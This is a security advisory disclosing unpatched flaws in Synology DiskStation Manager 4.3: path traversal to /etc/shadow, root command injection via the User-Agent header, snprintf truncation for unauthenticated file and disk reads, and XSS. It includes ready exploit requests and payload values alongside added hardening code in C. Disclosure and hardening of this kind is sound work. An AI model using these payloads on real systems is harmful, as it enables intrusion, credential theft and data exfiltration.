Synology DiskStation Manager (DSM) 4.3-3776 - Multiple Vulnerabilities

Author: Andrea Fabrizi
Platform: linux
Release date: 2013-09-12

**************************************************************
Title: Synology DSM multiple vulnerabilities
Version affected: <= 4.3-3776
Vendor: Synology
Discovered by: Andrea Fabrizi
Email: andrea.fabrizi@gmail.com
Web: http://www.andreafabrizi.it
Twitter: @andreaf83
Status: unpatched
**************************************************************

Synology DiskStation Manager (DSM) is a Linux-based operating system
used on the DiskStation and RackStation products.

1] ======== Remote file download ========
Any authenticated user, even one with the lowest privilege level, can
download any system file, including /etc/shadow, the Samba password
files and files owned by other DSM users, without any restriction.

The vulnerability is located in "/webman/wallpaper.cgi". The CGI takes
as parameter the full path of the image to download, encoded as ASCII
hex.
The problem is that any file type can be downloaded (not only images)
and the path validation is very poor. The CGI only checks whether the
path starts with an allowed directory (such as
/usr/syno/synoman/webman), and that kind of check is easily bypassed
with ../ traversal.

For example, to access /etc/shadow the encoded path is:
2f7573722f73796e6f2f73796e6f6d616e2f7765626d616e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f736861646f77
(/usr/syno/synoman/webman/../../../../etc/shadow)

------------------------------------------
GET /webman/wallpaper.cgi?path=AABBCCDDEEFF11223344 HTTP/1.1
Host: 127.0.0.1:5000
Cookie: stay_login=0; id=XXXXXXXXXXX
------------------------------------------
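The prefix-only check described above beside a hardened check that lexically normalises the decoded path before comparing it, as an added example (not Synology's code; the allowed directory, function names and 512-byte buffer are assumptions taken from the advisory's description):

```c
#include <stdbool.h>
#include <string.h>

#define ALLOWED_DIR "/usr/syno/synoman/webman/"

/* The weak check the advisory describes: a bare prefix comparison, which
 * "/usr/syno/synoman/webman/../../../../etc/shadow" passes. */
bool prefix_check_only(const char *path) {
    return strncmp(path, ALLOWED_DIR, strlen(ALLOWED_DIR)) == 0;
}

/* Lexically normalise an absolute path: collapse "//" and "/./" and
 * resolve "/../" by popping the previous component (never above "/").
 * Returns false if the path is not absolute or does not fit in out.
 * Note: this does not follow symlinks; realpath(3) on the final path
 * is still needed before opening it, as is a check on the file type. */
bool normalize_path(const char *in, char *out, size_t outsz) {
    if (in[0] != '/' || outsz < 2) return false;
    size_t o = 0;
    out[o++] = '/';
    for (const char *p = in; *p; ) {
        while (*p == '/') p++;                 /* skip separator runs */
        const char *start = p;
        while (*p && *p != '/') p++;
        size_t len = (size_t)(p - start);
        if (len == 0 || (len == 1 && start[0] == '.')) continue;
        if (len == 2 && start[0] == '.' && start[1] == '.') {
            if (o > 1) { o--; while (o > 1 && out[o - 1] != '/') o--; }
            continue;
        }
        if (o + len + 1 >= outsz) return false;
        memcpy(out + o, start, len);
        o += len;
        out[o++] = '/';
    }
    if (o > 1) o--;                            /* drop trailing '/' */
    out[o] = '\0';
    return true;
}

/* Hardened check: normalise first, then require the allowed prefix. */
bool path_allowed(const char *path) {
    char norm[512];
    if (!normalize_path(path, norm, sizeof norm)) return false;
    return strncmp(norm, ALLOWED_DIR, strlen(ALLOWED_DIR)) == 0;
}
```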

2] ======== Command injection ========
A command injection vulnerability in the
"/webman/modules/ControlPanel/modules/externaldevices.cgi" CGI
allows any administrative user to execute arbitrary commands on the
system with root privileges.

------------------------------------------
POST /webman/modules/ControlPanel/modules/externaldevices.cgi HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: ls
Cookie: stay_login=0; id=XXXXXXXXXXX
Content-Length: 128

action=apply&device_name=aa&printerid=1.1.1.1-aa';$HTTP_USER_AGENT>/tmp/output+%23&printer_mode=netPrinter&eject_netprinter=true
------------------------------------------

The command to execute is placed in the User-Agent string; after the
request, its output is available in the /tmp/output file.

3] ======== Partial remote content download ========
For localization, DSM uses several CGIs that take a lang parameter
(e.g. "enu" for English) and return a JSON object containing the
localized strings as a dictionary.

The strings are taken from a local file with the following path:
[current_dir]/texts/[lang_parameter_value]/strings

The "/strings" appended to the end of the path prevents path
injection, because any value injected through the "lang" parameter
ends up as a directory component (in other words, only files named
"strings" can be read). The interesting part, however, is that the
full path of the strings file is built with an snprintf call like this:

snprintf(&s, 0x80u, "texts/%s/strings", lang)

This means that a lang value large enough exceeds the 128-byte limit
passed to snprintf, so the output is truncated and the "/strings"
suffix is cut off from the built path.

For example, the lang value
"./////////////////////////////////////////////////////////////////////////////////////////../../../../../etc/synoinfo.conf"
allows retrieving the content of the /etc/synoinfo.conf file.

The second problem is that the input file read by the CGI must be
formatted as key/value pairs: key1=string1

In other words, to get content from an arbitrary file, each line to be
returned must contain at least one "=" (this is the reason why I called
the vulnerability "Partial remote content download").

At first glance this may seem very limiting, but since it is possible
to read directly from the disk block device (e.g. /dev/vg1000/lv), the
amount of data dumped is very large. In my tests I was able to dump
around 25/30% of the drive (tested with mixed content, like documents,
images, generic files). It is possible to dump data from any connected
drive. Interesting data can also be dumped from the /proc vfs.

This vulnerability affects two different CGIs and is exploitable
without authentication by any remote user:

/scripts/uistrings.cgi
/webfm/webUI/uistrings.cgi

------------------------------------------
GET /scripts/uistrings.cgi?lang=XXXXXXXXX HTTP/1.1
Host: 127.0.0.1:5000
------------------------------------------

There are two other uistrings.cgi binaries on the system, but they are not affected.
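The snprintf truncation that drops the "/strings" suffix, reproduced from the call shown in section 3, beside a hardened builder that validates the lang value and treats truncation as an error. This is an added example, not the DSM binary's code; the function names, the character allow-list and the hardened version are assumptions, and the over-long lang value is constructed in the shape the advisory shows:

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define PATH_BUF 0x80   /* buffer size from the advisory's snprintf call */

/* Vulnerable pattern: the snprintf return value is ignored, so a lang
 * longer than the buffer silently truncates the trailing "/strings"
 * and the attacker-controlled tail becomes the end of the path. */
void build_path_vulnerable(char *out, const char *lang) {
    snprintf(out, PATH_BUF, "texts/%s/strings", lang);
}

/* Hypothetical hardened version: accept only a plain directory name and
 * treat snprintf truncation (return value >= buffer size) as an error. */
bool build_path_hardened(char *out, const char *lang) {
    if (lang == NULL || *lang == '\0') return false;
    for (const char *p = lang; *p; p++)          /* no '/', '.', etc. */
        if (!isalnum((unsigned char)*p) && *p != '_' && *p != '-')
            return false;
    int n = snprintf(out, PATH_BUF, "texts/%s/strings", lang);
    if (n < 0 || n >= PATH_BUF) { out[0] = '\0'; return false; }
    return true;
}

/* Constructed lang value in the shape the advisory shows: "." plus
 * padding slashes plus a traversal, sized so "texts/" + lang is exactly
 * 127 bytes and the 128-byte buffer has no room left for "/strings". */
bool constructed_overlong_lang(char *dst, size_t dstsz) {
    const char *tail = "../../../../../etc/synoinfo.conf";   /* 32 bytes */
    size_t want = PATH_BUF - 1 - strlen("texts/");           /* 121 */
    size_t pad = want - 1 - strlen(tail);                     /* 88 */
    if (dstsz < want + 1) return false;
    dst[0] = '.';
    memset(dst + 1, '/', pad);
    memcpy(dst + 1 + pad, tail, strlen(tail) + 1);
    return true;
}

/* True when the vulnerable builder, given the constructed lang, yields a
 * full 127-byte path that no longer ends in "/strings". */
bool vulnerable_suffix_lost(void) {
    char lang[PATH_BUF], out[PATH_BUF];
    if (!constructed_overlong_lang(lang, sizeof lang)) return false;
    build_path_vulnerable(out, lang);
    size_t n = strlen(out);
    return n == PATH_BUF - 1 && strcmp(out + n - 8, "/strings") != 0;
}
```

The hardened builder also rejects an all-alphanumeric lang that is merely too long, because the truncation check fires before the path is used.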

4] ======== XSS ========
A classic cross-site scripting vulnerability affects the following CGI:
/webman/info.cgi?host=XXXX&target=XXXX&add=XXXX